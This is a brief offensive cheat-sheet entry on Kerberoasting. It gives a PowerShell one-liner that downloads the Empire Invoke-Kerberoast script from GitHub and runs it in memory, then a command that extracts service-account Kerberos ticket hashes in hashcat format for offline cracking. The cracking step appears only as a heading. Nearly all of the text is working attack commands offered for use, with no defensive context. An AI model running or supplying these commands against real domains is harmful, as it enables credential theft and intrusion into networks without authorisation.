Get SPN Account Ticket with Invoke-Kerberoast
Installing Invoke-Kerberoast script
iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')Loading into Memory
Invoke-Kerberoast -OutputFormat hashcat |fl
Cracking Hash using Hashcat
Last updated